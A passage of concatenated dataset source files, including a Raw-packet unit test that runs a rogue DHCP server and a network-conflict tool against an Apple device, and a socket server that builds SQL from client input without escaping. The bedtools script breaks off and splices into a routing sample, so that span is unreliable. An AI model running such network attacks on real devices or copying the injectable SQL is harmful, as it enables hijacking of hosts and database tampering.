self.first_name)\n # Fallback for alternative names\n if self.alternative_names:\n for n in self.alternative_names:\n if normalize_str(query) == normalize_str(n):\n return True\n return normalize_str(query) == normalize_str(name)\n def set_alternative_names(self, names):\n \"\"\"Set alternative names by which the member should also\n be recognized in the meeting notes.\n\n Args:\n names (list(str)): All the alternative names of the member\n \"\"\"\n self.alternative_names = names\n def get_image(self):\n \"\"\"If the Member has a Wikipedia page, this method will attempt to scrape\n their image from this website.\n\n Returns:\n str: URI to the image or None if no image was found.\n \"\"\"\n if not self.url:\n return None\n page = requests.get(self.url)\n\n soup = BeautifulSoup(page.content, 'html.parser')\n result = None\n infobox = soup.find(\"table\", {\"class\": \"infobox\"})\n if infobox:\n result = \"https:%s\" % infobox.find('img')['src'] if infobox.find('img') else None\n return result\n","sub_path":"member.py","file_name":"member.py","file_ext":"py","file_size_in_byte":3756,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"207313492","text":"class Song(object):\n\n def __init__(self, xulei):\n self.xulei = xulei\n\n def sing_me_a_song(self):\n for line in self.xulei:\n print(line)\n\nhappy_bday = Song([ \"Happy birthday to you\",\n \"I don't want to get sued\",\n \"So I'll stop right there\"])\n\nbulls_on_parade = Song([\"They rally around the family\",\n \"With pockets full of shells\"])\n\nhappy_bday.sing_me_a_song()\n\nbulls_on_parade.sing_me_a_song()\n\nclass Person:\n def __init__(self, luck, name, website):\n self.self = self\n self.luck = luck\n self.name = name\n self.website = website\n#\n# def monkey(self):\n# for myself in self.luck:\n# print(myself)\n\nxulei = 
Person(\"Happy birthday\",\"I love you\",\"I hate you\")\n#print(xulei.self)\nprint(xulei.luck)\nprint(xulei.name)\nprint(xulei.website)\n#xulei.monkey()\n#info.luck\n#info.name\n#info.website","sub_path":"EX40.py","file_name":"EX40.py","file_ext":"py","file_size_in_byte":924,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"357070918","text":"#Using output from Variant.py \n#wc -l *H* > genotypes\n\nimport pandas as pd\n\n#Read in genotypes\ngt=pd.read_csv(\"genotypes\",sep='\\s+',header=None)\n\nvars=[\"rs1990760\",\"rs60910145\",\"rs73885319\"]\nfor v in vars:\n #Loop through pops\n pop=[\"AFR\",\"AMR\",\"EUR\",\"EAS\",\"SAS\"]\n table=[]\n for p in pop:\n #Variant of interest\n variant=gt[gt[1].str.contains(v)]\n #pop\n variant=variant[variant[1].str.contains(p)]\n #Get total(n) and calc genotype freq\n Total=variant[0].sum()\n variant[p] = variant[0] /Total \n variant=variant.reset_index() \n #(HomAlt*2 + Het)/Total*2. This will be the alt allele freq.\n alt_alFreq=(variant[1:2][0][1]*2 + variant[0:1][0][0])/(Total*2)\n ref_alFreq=1-alt_alFreq\n ##Build table \n #Genotype freq\n variant=variant.transpose()[p:p]\n variant.columns = [\"Heterozygous\",\"HomozygousAlt\",\"HomozygousRef\"]\n #Other columns\n variant[\"n\"]=Total\n variant[\"Alt\"]=alt_alFreq\n variant[\"Ref\"]=ref_alFreq \n table.append(variant)\n table=pd.concat(table)\n table['Super Population']=table.index\n table=table[[\"Super Population\",\"n\",\"Heterozygous\",\"HomozygousAlt\",\"HomozygousRef\",\"Alt\",\"Ref\"]]\n table.to_csv(v+\"_table.txt\",sep='\\t',index=False,mode='w')\n","sub_path":"Tools/VariantTable.py","file_name":"VariantTable.py","file_ext":"py","file_size_in_byte":1320,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"186539961","text":"# region Description\n\"\"\"\ntest_apple_rogue_dhcp.py: Unit tests for Raw-packet script: apple_dhcp_server.py\nAuthor: Vladimir Ivanov\nLicense: MIT\nCopyright 2020, Raw-packet Project\n\"\"\"\n# endregion\n\n# region Import\nfrom sys import path\nfrom os.path import dirname, abspath\nfrom os import system, kill\nfrom signal import SIGTERM\nfrom time import sleep, time\nfrom subprocess import run, Popen, PIPE, STDOUT\nfrom unittest.mock import patch\nfrom typing import List, Union\nimport unittest\nimport paramiko\n# endregion\n\n# region Authorship information\n__author__ = 'Vladimir Ivanov'\n__copyright__ = 'Copyright 2020, Raw-packet Project'\n__credits__ = ['']\n__license__ = 'MIT'\n__version__ = '0.2.1'\n__maintainer__ = 'Vladimir Ivanov'\n__email__ = 'ivanov.vladimir.mail@gmail.com'\n__status__ = 'Development'\n# endregion\n\n\n# region Main class - ScriptAppleRogueDhcpTest\nclass ScriptAppleRogueDhcpTest(unittest.TestCase):\n\n # region Properties\n root_path = dirname(dirname(dirname(dirname(dirname(dirname(abspath(__file__)))))))\n path.append(root_path)\n from raw_packet.Tests.Unit_tests.variables import Variables\n from raw_packet.Utils.base import Base\n base: Base = Base()\n # endregion\n\n def kill_test_process(self) -> None:\n while self.base.get_process_pid('/apple_dhcp_server.py') != -1:\n kill(self.base.get_process_pid('/apple_dhcp_server.py'), SIGTERM)\n sleep(0.1)\n\n @staticmethod\n def restart_dhcp_server_over_ssh() -> None:\n run(['ssh ' + ScriptAppleRogueDhcpTest.Variables.router_root_username + '@' +\n ScriptAppleRogueDhcpTest.Variables.router_ipv4_address + ' \"/etc/init.d/dnsmasq restart\"'], shell=True)\n\n def 
check_apple_device_connected(self) -> None:\n self.kill_test_process()\n sleep(5)\n response: int = system(\"ping -c 1 \" + ScriptAppleRogueDhcpTest.Variables.apple_device_ipv4_address)\n if response == 0:\n return None\n else:\n self.restart_dhcp_server_over_ssh()\n while response != 0:\n response = system(\"ping -c 1 \" + ScriptAppleRogueDhcpTest.Variables.apple_device_ipv4_address)\n\n def test01_start_without_params(self):\n mitm_process = run(['python3 ' + self.root_path + '/Scripts/Apple/apple_dhcp_server.py'],\n stdout=PIPE, stderr=STDOUT, shell=True)\n mitm_process_stdout: str = mitm_process.stdout.decode('utf-8')\n print(mitm_process_stdout)\n self.assertIn('the following arguments are required', mitm_process_stdout)\n self.assertIn('--target_mac', mitm_process_stdout)\n self.assertIn('--target_new_ip', mitm_process_stdout)\n\n def test02_start_without_target_new_ip(self):\n mitm_process = run(['python3 ' + self.root_path + '/Scripts/Apple/apple_dhcp_server.py --target_mac ' +\n ScriptAppleRogueDhcpTest.Variables.apple_device_mac_address],\n stdout=PIPE, stderr=STDOUT, shell=True)\n mitm_process_stdout: str = mitm_process.stdout.decode('utf-8')\n print(mitm_process_stdout)\n self.assertIn('the following arguments are required', mitm_process_stdout)\n self.assertIn('--target_new_ip', mitm_process_stdout)\n\n def test03_start_without_target_mac(self):\n mitm_process = run(['python3 ' + self.root_path + '/Scripts/Apple/apple_dhcp_server.py --target_new_ip ' +\n ScriptAppleRogueDhcpTest.Variables.apple_device_new_ipv4_address],\n stdout=PIPE, stderr=STDOUT, shell=True)\n mitm_process_stdout: str = mitm_process.stdout.decode('utf-8')\n print(mitm_process_stdout)\n self.assertIn('the following arguments are required', mitm_process_stdout)\n self.assertIn('--target_mac', mitm_process_stdout)\n\n def test04_main_bad_interface(self):\n mitm_process = run(['python3 ' + self.root_path + '/Scripts/Apple/apple_dhcp_server.py --interface ' +\n ScriptAppleRogueDhcpTest.Variables.bad_network_interface + ' --target_mac ' +\n ScriptAppleRogueDhcpTest.Variables.apple_device_mac_address + ' --target_new_ip ' +\n ScriptAppleRogueDhcpTest.Variables.apple_device_new_ipv4_address],\n stdout=PIPE, stderr=STDOUT, shell=True)\n mitm_process_stdout: str = mitm_process.stdout.decode('utf-8')\n print(mitm_process_stdout)\n self.assertIn(ScriptAppleRogueDhcpTest.Variables.bad_network_interface, mitm_process_stdout)\n\n def test05_main(self):\n self.check_apple_device_connected()\n run(['python3 ' + self.root_path + '/Scripts/Others/network_conflict_creator.py --interface ' +\n ScriptAppleRogueDhcpTest.Variables.test_network_interface + ' --target_mac ' +\n ScriptAppleRogueDhcpTest.Variables.apple_device_mac_address + ' --target_ip ' +\n ScriptAppleRogueDhcpTest.Variables.apple_device_ipv4_address + ' --quiet'], shell=True)\n run(['python3 ' + self.root_path + '/Scripts/Apple/apple_dhcp_server.py --interface ' +\n ScriptAppleRogueDhcpTest.Variables.test_network_interface + ' --target_mac ' +\n ScriptAppleRogueDhcpTest.Variables.apple_device_mac_address + ' --target_new_ip ' +\n ScriptAppleRogueDhcpTest.Variables.apple_device_new_ipv4_address + ' --quiet'], shell=True)\n sleep(5)\n response: int = system(\"ping -c 1 \" + ScriptAppleRogueDhcpTest.Variables.apple_device_new_ipv4_address)\n self.assertEqual(response, 0)\n self.check_apple_device_connected()\n\n# 
endregion\n","sub_path":"raw_packet/Tests/Unit_tests/Scripts/Apple/test_apple_rogue_dhcp.py","file_name":"test_apple_rogue_dhcp.py","file_ext":"py","file_size_in_byte":5623,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"281597188","text":"#compare distribution of peak-gene distances in same cluster vs. peak-gene distances to other clusters.\nfrom pybedtools import BedTool\nthreshold=1000000\ndef get_background(to_exclude):\n peak_background=\"\"\n gene_background=\"\" \n for i in range(1,7):\n if (i!=to_exclude):\n cur_peaks=open(str(i)+\".peaks.bed\").read()\n cur_genes=open(str(i)+\".genes.bed\").read()\n peak_background=peak_background+'\\n'+cur_peaks\n gene_background=gene_background+'\\n'+cur_genes\n peak_background=BedTool(peak_background,from_string=True)\n gene_background=BedTool(gene_background,from_string=True)\n peak_background=peak_background.sort()\n gene_background=gene_background.sort()\n return peak_background,gene_background \nimport pdb \nfor cluster in range(1,7):\n #get the peaks & genes for the current cluster \n peak_bed=BedTool(str(cluster)+\".peaks.bed\")\n gene_bed=BedTool(str(cluster)+\".genes.bed\")\n #get the background\n peak_background,gene_background=get_background(cluster)\n #peak to gene closest, cur cluster\n peak_to_gene_foreground=[int(str(i).strip().split('\\t')[-1]) for i in peak_bed.closest(gene_bed,wao=True,d=True,t=\"first\")]\n #gene to peak closest, cur cluster\n gene_to_peak_foreground=[int(str(i).strip().split('\\t')[-1]) for i in gene_bed.closest(peak_bed,wao=True,d=True,t=\"first\")]\n #peak to gene closest, background\n peak_to_gene_background=[int(str(i).strip().split('\\t')[-1]) for i in peak_bed.closest(gene_background,wao=True,d=True,t=\"first\")]\n #gene to peak closest, background\n gene_to_peak_background=[int(str(i).strip().split('\\t')[-1]) for i in gene_bed.closest(peak_background,wao=True,d=True,t=\"first\")]\n print(\"got closest values for cluster \"+str(cluster))\n #append the peak and gene distances to consider them in a single distribution\n foreground=peak_to_gene_foreground+gene_to_peak_foreground\n background=peak_to_gene_background+gene_to_peak_background\n foreground=[foreground[i] for i in range(len(foreground)) if foreground[i] \"\n )\n index = solution.Value(routing.NextVar(index))\n time_var = time_dimension.CumulVar(index)\n plan_output += (\n f\"{manager.IndexToNode(index)}\"\n f\" Time({solution.Min(time_var)},{solution.Max(time_var)})\\n\"\n )\n plan_output += f\"Time of the route: {solution.Min(time_var)}min\\n\"\n print(plan_output)\n total_time += solution.Min(time_var)\n print(f\"Total time of all routes: {total_time}min\")\n # [END solution_printer]\n\n\ndef main():\n \"\"\"Solve the VRP with time windows.\"\"\"\n # Instantiate the data problem.\n # [START data]\n data = create_data_model()\n # [END data]\n\n # Create the routing index manager.\n # [START index_manager]\n manager = pywrapcp.RoutingIndexManager(\n len(data[\"time_matrix\"]), data[\"num_vehicles\"], data[\"depot\"]\n )\n # [END index_manager]\n\n # Create Routing Model.\n # [START routing_model]\n routing = pywrapcp.RoutingModel(manager)\n # [END routing_model]\n\n # Create and register a transit callback.\n # [START transit_callback]\n def time_callback(from_index, to_index):\n \"\"\"Returns the travel time between the two nodes.\"\"\"\n # Convert from routing variable Index to time matrix NodeIndex.\n from_node = manager.IndexToNode(from_index)\n to_node = 
manager.IndexToNode(to_index)\n        return data[\"time_matrix\"][from_node][to_node]\n\n    transit_callback_index = routing.RegisterTransitCallback(time_callback)\n    # [END transit_callback]\n\n    # Define cost of each arc.\n    # [START arc_cost]\n    routing.SetArcCostEvaluatorOfAllVehicles(transit_callback_index)\n    # [END arc_cost]\n\n    # Add Time Windows constraint.\n    # [START time_windows_constraint]\n    time = \"Time\"\n    routing.AddDimension(\n        transit_callback_index,\n        60, # allow waiting time\n        60, # maximum time per vehicle\n        False, # Don't force start cumul to zero.\n        time,\n    )\n    time_dimension = routing.GetDimensionOrDie(time)\n    # Add time window constraints for each location except depot.\n    for location_idx, time_window in enumerate(data[\"time_windows\"]):\n        if location_idx == 0:\n            continue\n        index = manager.NodeToIndex(location_idx)\n        time_dimension.CumulVar(index).SetRange(time_window[0], time_window[1])\n    # Add time window constraints for each vehicle start node.\n    for vehicle_id in range(data[\"num_vehicles\"]):\n        index = routing.Start(vehicle_id)\n        time_dimension.CumulVar(index).SetRange(\n            data[\"time_windows\"][0][0], data[\"time_windows\"][0][1]\n        )\n    # [END time_windows_constraint]\n\n    # Add resource constraints at the depot.\n    # [START depot_load_time]\n    solver = routing.solver()\n    intervals = []\n    for i in range(data[\"num_vehicles\"]):\n        # Add time windows at start of routes\n        intervals.append(\n            solver.FixedDurationIntervalVar(\n                time_dimension.CumulVar(routing.Start(i)),\n                data[\"vehicle_load_time\"],\n                \"depot_interval\",\n            )\n        )\n        # Add time windows at end of routes.\n        intervals.append(\n            solver.FixedDurationIntervalVar(\n                time_dimension.CumulVar(routing.End(i)),\n                data[\"vehicle_unload_time\"],\n                \"depot_interval\",\n            )\n        )\n    # [END depot_load_time]\n\n    # [START depot_capacity]\n    depot_usage = [1 for i in range(len(intervals))]\n    solver.Add(\n        solver.Cumulative(intervals, depot_usage, data[\"depot_capacity\"], \"depot\")\n    )\n    # [END depot_capacity]\n\n    # Instantiate route start and end times to produce feasible times.\n    # [START depot_start_end_times]\n    for i in range(data[\"num_vehicles\"]):\n        routing.AddVariableMinimizedByFinalizer(\n            time_dimension.CumulVar(routing.Start(i))\n        )\n        routing.AddVariableMinimizedByFinalizer(time_dimension.CumulVar(routing.End(i)))\n    # [END depot_start_end_times]\n\n    # Setting first solution heuristic.\n    # [START parameters]\n    search_parameters = pywrapcp.DefaultRoutingSearchParameters()\n    search_parameters.first_solution_strategy = (\n        routing_enums_pb2.FirstSolutionStrategy.PATH_CHEAPEST_ARC\n    )\n    # [END parameters]\n\n    # Solve the problem.\n    # [START solve]\n    solution = routing.SolveWithParameters(search_parameters)\n    # [END solve]\n\n    # Print solution on console.\n    # [START print_solution]\n    if solution:\n        print_solution(data, manager, routing, solution)\n    # [END print_solution]\n    else:\n        print(\"No solution found !\")\n\n\nif __name__ == \"__main__\":\n    main()\n# [END program]\n","sub_path":"ortools/constraint_solver/samples/vrp_resources.py","file_name":"vrp_resources.py","file_ext":"py","file_size_in_byte":8066,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
{"seq_id":"429803133","text":"# -*- coding:utf-8 -*-\n\nimport socket\nimport sys\nimport time\nimport threading\nimport sqlite3\nfrom PyQt5.QtCore import pyqtSignal,QObject\n\nclass Server(QObject):\n\n    # address and port to listen on\n    listen_addr = ('0.0.0.0',10003)\n    user_id_len = 20\n    
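# emitted once a client connection has finished uploading, so a Qt UI can react\n    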
recv_complete = pyqtSignal()\n\n    def __init__(self):\n        super(Server, self).__init__() \n\n    def _recv_handle(self,sock,client_addr):\n        print('New connection from %s:%s' % client_addr)\n\n\n        conn = sqlite3.connect('test.db')\n        cursor = conn.cursor()\n\n        recv_buf = ''\n        recv_time = time.strftime('%c',time.localtime())\n\n        # receive the user name\n        try:\n            user_id = sock.recv(17).decode('utf-8')\n            # add new user if not exists\n            cursor.execute('CREATE TABLE IF NOT EXISTS \"%s\" (Time CHAR(20),GPSRecord TEXT)'%(user_id,))\n            cursor.execute('INSERT INTO \"%s\" (Time,GPSRecord) VALUES(\"%s\",\" \")' % (user_id,recv_time))\n        except socket.timeout:\n            print('Time out')\n        # receive the GPS data\n        while True:\n            try:\n                recv_buf = sock.recv(1024)\n                # append to the GPSRecord of the user named user_id\n                cursor.execute('UPDATE \"%s\" SET GPSRecord=GPSRecord||\"%s\" WHERE Time=\"%s\"' % (user_id,recv_buf.decode('utf-8'),recv_time))\n                time.sleep(1)\n                if not recv_buf:\n                    break\n            except socket.timeout:\n                print('Time out')\n                break\n\n        sock.close()\n        cursor.close()\n        conn.commit()\n        conn.close()\n        print('Connection from %s:%s ended' % client_addr)\n        self.recv_complete.emit()\n\n\n    def start_recv(self):\n        self.listen_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n        self.listen_socket.bind(Server.listen_addr)\n        socket.setdefaulttimeout(5)\n        self.listen_socket.listen(5)\n\n        print('Waiting for connection...')\n        while True:\n            sock, client_addr = self.listen_socket.accept()\n            t = threading.Thread(target=self._recv_handle,\n                                 args=(sock, client_addr))\n            t.setDaemon(True)\n            t.start()\n\nif __name__ == '__main__':\n    myserver = Server()\n    myserver.start_recv()\n\n    sys.exit()","sub_path":"example/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":2293,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
{"seq_id":"243689033","text":"# LOOK Reformat (Alt+F). Show Intention Action (Alt+Enter). Completion (Ctrl+Space, Ctrl+Shift+Space)\n\n\n\n\nimport json\nimport csv\nimport os\nimport time\nimport logging\n\nimport urllib\nimport urllib.parse\nimport urllib.request\nfrom contextlib import closing\nfrom bs4 import BeautifulSoup\nfrom sys import stdout as syso\nfrom socket import timeout\n\n\nclass Game:\n    \"\"\"Describe a single steam app. More often than not, a game. Could also represent software, DLC, and anything bought from steam.\"\"\"\n\n    def __init__(self, name):\n        self.id = None\n        self.users_name = name\n        self.simplified_name = simplified_name(name)\n        self.card_status_known = False\n        self.has_cards = False\n\n    def __str__(self):\n        return self.users_name\n\n    def __repr__(self):\n        return \"<Game %s>\" % self.users_name\n\n    def find_id(self, applist=None, config=None, online=True):\n        accessed_net = False\n\n        if self.id is not None:\n            logging.info(\"ID for %s is already known.\", self.users_name)\n            return accessed_net\n\n        if applist is not None:\n            \"\"\"Lookup your own id in the supplied list. If there are multiple games with this name it is better to leave the decision to google, if possible.\"\"\"\n            if not online or not applist.contains_duplicates(self.simplified_name):\n                logging.info('Looking in applist for %s' % self.users_name)\n                self.id = applist.name_lookup.get(self.simplified_name, None) # default value = None\n\n        if self.id is None and online:\n            \"\"\"ID wasn't found in the applist. Looking for it in google.\"\"\"\n            logging.info('\"%s\" was not found in the applist. Looking in google.' 
% self.users_name)\n # return Game.__scrap_id_from_google__(name)\n if config[\"key\"] is not None:\n self.id = Game.__search_id_google_api__(self.users_name, config[\"cx\"], config[\"key\"])\n accessed_net = True\n else:\n logging.info(\"Can't search google for %s because API key is not set. Skipping.\", self.users_name)\n\n if self.id is not None:\n logging.info(\"ID for %s is found. %s\", self.users_name, self.id)\n return accessed_net\n\n @staticmethod\n def __scrap_id_from_google__(name):\n \"\"\" Unused. Preform a google search with the name given by the user in order to locate the correct game.\"\"\"\n url = \"http://www.google.com/search?q=site:store.steampowered.com+%s&lr=lang_en\" % urllib.parse.quote(name, safe=\"\")\n hdr = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36'}\n req = urllib.request.Request(url, headers=hdr)\n\n try:\n time.sleep(5)\n with urllib.request.urlopen(req) as f:\n html = f.read()\n\n # html = urllib.request.urlopen(req).read()\n except urllib.error.HTTPError:\n logging.exception(\"Failed while googling the name %s\", name)\n return None\n\n try:\n soup = BeautifulSoup(html, 'html.parser')\n anchors = soup.find(id=\"search\").findAll('a')\n final_links = [x['href'] for x in anchors if x['href'].startswith(\"http://store.steampowered.com/app/\") or x['href'].startswith(\"https://store.steampowered.com/app/\")]\n # print(\"\\n\".join(final_links))\n top_link = final_links[0]\n app_id = top_link[top_link.index(\"/app/\") + len(\"/app/\"):]\n app_id = app_id[:app_id.index(\"/\")]\n return app_id\n\n except (json.decoder.JSONDecodeError, KeyError):\n logging.exception(\"Failed to parse google's response to %s\", name)\n return None\n\n @staticmethod\n def __search_id_google_api__(name, cx, key, timeout_time=10):\n \"\"\"Uses google's custom search api to find your id\"\"\"\n url = \"https://www.googleapis.com/customsearch/v1?q=%s&cx=%s&key=%s&fields=searchInformation(totalResults),items(title,link)\"\n url %= urllib.parse.quote(name, safe=\"\"), urllib.parse.quote(cx, safe=\"\"), urllib.parse.quote(key, safe=\"\")\n hdr = {'User-Agent': 'CardsTool'}\n req = urllib.request.Request(url, headers=hdr)\n try:\n with urllib.request.urlopen(req, timeout=timeout_time) as f:\n json_bytes = f.read()\n except timeout:\n logging.error(\"Timeout while getting appid for %s. \\n\\t\\t%s\", name, req.get_full_url())\n return None\n except urllib.error.HTTPError:\n logging.exception(\"Failed while googling the name %s\", name)\n return None\n json_text = json_bytes.decode(\"utf-8\")\n try:\n data = json.loads(json_text)\n total_results = int(data[\"searchInformation\"][\"totalResults\"])\n if total_results < 1 or len(data[\"items\"]) < 1:\n logging.error(\"No results found for %s\", name)\n return None\n\n\n except (json.decoder.JSONDecodeError, KeyError, ValueError):\n logging.exception(\"Failed to parse google's response for %s\", name)\n return None\n top_result = data[\"items\"][0][\"title\"]\n top_link = data[\"items\"][0][\"link\"]\n\n app_id = top_link[top_link.index(\"/app/\") + len(\"/app/\"):]\n app_id = app_id[:app_id.index(\"/\")]\n return app_id\n\n def fetch_card_info(self):\n \"\"\"Use Steam's web api to find out whatever the app has cards.\"\"\"\n accessed_net = False\n\n if self.card_status_known:\n logging.info(\"Card status for %s is already known. %s. 
Skipping fetch.\", self.users_name, self.has_cards)\n return accessed_net\n if self.id is None:\n logging.warning(\"Unknown app_id: Skipping data fetch for %s.\", self.users_name)\n return accessed_net\n logging.info(\"Fetching card data for app %s (%s).\", self.id, self.users_name)\n data = Game.__app_details_steam_api__(self.id)\n accessed_net = True\n if data is None:\n logging.error(\"Fetching Failed! app %s (%s).\", self.id, self.users_name)\n return accessed_net\n\n self.card_status_known = True\n for tag in data[\"categories\"]:\n if tag[\"id\"] == 29: # and tag[\"description\"] == \"Steam Trading Cards\":\n self.has_cards = True\n logging.info(\"Card status for %s is found. %s\", self.users_name, self.has_cards)\n return accessed_net\n\n @staticmethod\n def __app_details_steam_api__(app_id, timeout_time=20):\n \"\"\"Use Steam's web api and fetch details about the app whose ID is app_id\"\"\"\n req = urllib.request.Request(\"http://store.steampowered.com/api/appdetails/?appids=\" + app_id)\n try:\n with urllib.request.urlopen(req, timeout=timeout_time) as f:\n json_bytes = f.read()\n\n except timeout:\n logging.error(\"Timeout while getting details for %s. \\n\\t\\t%s\", app_id, req.get_full_url())\n return None\n except urllib.error.HTTPError:\n logging.exception(\"Failed getting details for app number %s\", app_id)\n return None\n json_text = json_bytes.decode(\"utf-8\")\n try:\n game_info = json.loads(json_text)\n if not game_info[app_id][\"success\"]:\n return None\n\n data = game_info[app_id][\"data\"]\n return data\n\n except (json.decoder.JSONDecodeError, KeyError):\n logging.exception(\"Failed to parse details for app number %s\", app_id)\n return None\n\n\nclass AppList:\n \"\"\"Describe a list of appIDs and app names. Used to find the name of the app based on the id.\"\"\"\n FETCH_URL = \"http://api.steampowered.com/ISteamApps/GetAppList/v0001/\"\n FETCH_LOCAL_PATH = \"Applist.txt\"\n\n def __init__(self):\n self.__data__ = None\n self.id_lookup = None\n self.name_lookup = None\n self.simplified_names = None\n\n @staticmethod\n def fetch_from_net(url=FETCH_URL):\n \"\"\"Fetch new AppList from the web. See: http://api.steampowered.com/ISteamApps/GetAppList/v0001/ \"\"\"\n req = urllib.request.Request(url)\n try:\n with urllib.request.urlopen(req) as f:\n json_bytes = f.read()\n except urllib.error.HTTPError:\n logging.exception(\"Failed to fetch applist from net\")\n return None\n\n return json_bytes.decode(\"utf-8\")\n\n @staticmethod\n def fetch_from_disk(path=FETCH_LOCAL_PATH):\n \"\"\"Fetch AppList from the disk where it was previously saved.\"\"\"\n with open(path, encoding='UTF-8') as file:\n return file.read()\n\n @staticmethod\n def write_apps_to_disk(data, path=FETCH_LOCAL_PATH):\n \"\"\"Write ApplList to the disk. Probably because a new one was fetched from the internet.\"\"\"\n with open(path, \"w\", encoding='UTF-8') as file:\n file.write(data)\n\n @staticmethod\n def json_to_list(json_text):\n \"\"\"Parse the json data and turn it into a list of id-name pairs\"\"\"\n try:\n game_info = json.loads(json_text)\n return game_info[\"applist\"][\"apps\"][\"app\"]\n\n except (json.decoder.JSONDecodeError, KeyError):\n logging.exception(\"Failed to parse fetched applist\")\n return None\n\n def fetch(self, always_fetch_from_net=False):\n \"\"\"Fill the object with data about app names. get the data either from a local file or from the internet. 
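The parsed applist is cached on the instance and the method returns self, so calls can be chained. 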
Automatically access the net if the file is missing.\"\"\"\n if self.__data__ is not None:\n return self\n\n if always_fetch_from_net or not os.path.exists(AppList.FETCH_LOCAL_PATH):\n json_text = AppList.fetch_from_net()\n self.__data__ = AppList.json_to_list(json_text)\n AppList.write_apps_to_disk(json_text)\n else:\n self.__data__ = AppList.json_to_list(AppList.fetch_from_disk())\n\n # Lookup appid->name\n self.id_lookup = {pair[\"appid\"]: pair[\"name\"] for pair in self.__data__}\n\n # Lookup name->appid. It is possible that there are multiple games with the same name. Remove all of them. Handle it latter in the code.\n self.simplified_names = [simplified_name(pair[\"name\"]) for pair in self.__data__]\n id_strings = [str(pair[\"appid\"]) for pair in self.__data__]\n\n self.name_lookup = {name: appid for (name, appid) in zip(self.simplified_names, id_strings)}\n return self\n\n def contains_duplicates(self, name):\n return self.simplified_names.count(name) > 1\n\n\ndef simplified_name(name):\n \"\"\"Takes a name and transforms it into simpler form that will be used as dict key. Used to make sure that even if the user wrote non-exact name the program will still recognize it.\n For example transforms \"Brütal Legend\" into \"Brutal Legend\". Whatever spelling the user used in his list, both will be mapped to the same key.\n \"\"\"\n ret = name.strip()\n ret = ret.lower()\n\n translation_table = dict.fromkeys(map(ord, \"™®©!,.'’`[](){}\\\"\"), None)\n translation_table.update(dict.fromkeys(map(ord, \"_-:;\"), \" \"))\n translation_table[ord(\"&\")] = \"and\"\n translation_table[ord(\"á\")] = \"a\"\n translation_table[ord(\"é\")] = \"e\"\n translation_table[ord(\"í\")] = \"i\"\n translation_table[ord(\"ó\")] = \"o\"\n translation_table[ord(\"ö\")] = \"o\"\n translation_table[ord(\"ú\")] = \"u\"\n translation_table[ord(\"ü\")] = \"u\"\n translation_table[ord(\"fi\")] = \"fi\"\n\n ret = ret.translate(translation_table)\n ret = \" \".join(ret.split())\n return ret\n\n\nclass Exporter:\n def __init__(self, *args):\n self.exporter_list = list(args)\n\n\n def add_output(self, exporter):\n self.exporter_list.append(exporter)\n\n\n def write(self, game):\n for e in self.exporter_list:\n e.write(game.users_name, game.id, game.card_status_known, game.has_cards)\n\n def close(self):\n for e in self.exporter_list:\n if callable(getattr(e, \"close\", None)):\n e.close()\n\n def flush(self):\n for e in self.exporter_list:\n if callable(getattr(e, \"flush\", None)):\n e.flush()\n\n class CSVFile:\n\n def __init__(self, filename):\n self.file = open(filename, mode=\"w\", encoding='UTF-8', newline='')\n self.file_writer = csv.writer(self.file)\n\n def close(self):\n self.file.close()\n\n def flush(self):\n \"\"\"Source: https://stackoverflow.com/a/19756479/2842452\"\"\"\n self.file.truncate()\n self.file.seek(0, 0)\n self.file.flush()\n os.fsync(self.file.fileno())\n\n\n\n def write(self, name, appid, card_status_known, has_cards):\n appid = str(appid) if appid is not None else \"\"\n status = \"\" if not card_status_known else \"TRUE\" if has_cards else \"FALSE\"\n self.file_writer.writerow([name, appid, status])\n\n class Log:\n\n def __init__(self, level=logging.INFO):\n self.level = level\n\n\n def write(self, name, appid, card_status_known, has_cards):\n appid = str(appid) if appid is not None else \"?\"\n status = \"?\" if not card_status_known else \"TRUE\" if has_cards else \"FALSE\"\n logging.log(self.level, \"%s (%s): [%s]\", name, appid, status)\n\n class TextBox:\n\n def __init__(self, box, 
index):\n self.box = box\n self.index = index\n\n def write(self, name, appid, card_status_known, has_cards):\n appid = str(appid) if appid is not None else \"?\"\n status = \"?\" if not card_status_known else \"TRUE\" if has_cards else \"FALSE\"\n self.box.insert(self.index, \"%s (%s): [%s]\\n\" % (name, appid, status))\n\n\n\nclass Delayer:\n def __init__(self, long_sleep_count=50, short_sleep_time=1.5, long_sleep_time=15):\n self.count = long_sleep_count\n self.i = long_sleep_count\n self.short = short_sleep_time\n self.long = long_sleep_time\n\n def tick(self):\n time.sleep(self.short)\n self.i -= 1\n if self.i <= 0:\n self.i = self.count\n logging.info(\"Accessed the internet %d times. Taking a short break to avoid overwhelming APIs.\", self.count)\n time.sleep(self.long)\n\n\ndef init_log(filename=None, console=False, level=logging.WARNING):\n logger = logging.getLogger()\n\n if filename is not None:\n handler = logging.FileHandler(filename, encoding=\"utf-8\", mode='w')\n handler.setFormatter(logging.Formatter(fmt='%(asctime)s %(levelname)s:%(message)s', datefmt=\"%Y-%m-%d %H:%M:%S\"))\n logger.addHandler(handler)\n\n if console: # False or None means no output. True means syso output. Instance of stream means output to the stream.\n stream = syso if console is True else console\n handler = logging.StreamHandler(stream)\n logger.addHandler(handler)\n\n logger.setLevel(level)\n\n\ndef string_represent_int(s):\n \"\"\"Source: https://stackoverflow.com/a/1267145/2842452\"\"\"\n try:\n int(s)\n return True\n\n except ValueError:\n return False\n\n\ndef load_config_file(path):\n with open(path, encoding='UTF-8') as file:\n config = json.loads(file.read())\n if config[\"key\"] == \"YOUR_KEY_HERE\":\n config[\"key\"] = None\n logging.warning(\"No Google API key is set. Using google search is impossible.\")\n\n return config\n\n\ndef users_game_gen(path):\n \"\"\"Reads the file located in path and creates a Game object for each game written there. One game name per line.\"\"\"\n\n with open(path, encoding='UTF-8', newline=\"\") as file:\n file_reader = csv.reader(file)\n for row in file_reader:\n if 